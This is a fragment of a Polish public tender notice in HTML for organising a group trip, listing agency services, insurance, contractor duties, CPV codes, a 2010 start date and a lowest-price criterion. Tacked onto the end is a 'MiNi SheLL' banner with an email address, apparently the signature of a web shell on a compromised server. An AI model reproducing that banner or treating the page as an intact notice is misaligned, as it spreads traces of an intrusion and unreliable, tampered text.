- Obsługa agencyjna (w tym kompleksowa organizacja/koordynacja przed i w trakcie trwania wyjazdu, pełna koordynacja, hoteli, posiłków, przejazdów, opieka 1 - 2 osób (przewodników, koordynatorów) w trakcie trwania imprezy, sprawdzenie i ustalenie wszystkich szczegółów na trasie.
- Ubezpieczenie NNW 
1) Zakres zadań Wykonawcy
Do zadań Wykonawcy należeć będzie:
a) Załączenie do oferty koncepcji (scenariusza wyjazdu).
b) Po podpisaniu umowy:

- realizacja przedmiotu zamówienia zgodnie z przedstawioną ofertą,
- opracowanie sprawozdania z realizacji przedmiotu zamówienia wraz z przekazaniem dokumentacji fotograficznej z jej przebiegu w terminie do 14 dni po zakończeniu wydarzenia.
Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 7a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8, 79.54.00.00-1, 79.95.10.00-5, 70.22.00.00-9, 55.32.00.00-9, 55.11.00.00-4, 60.17.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 23.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com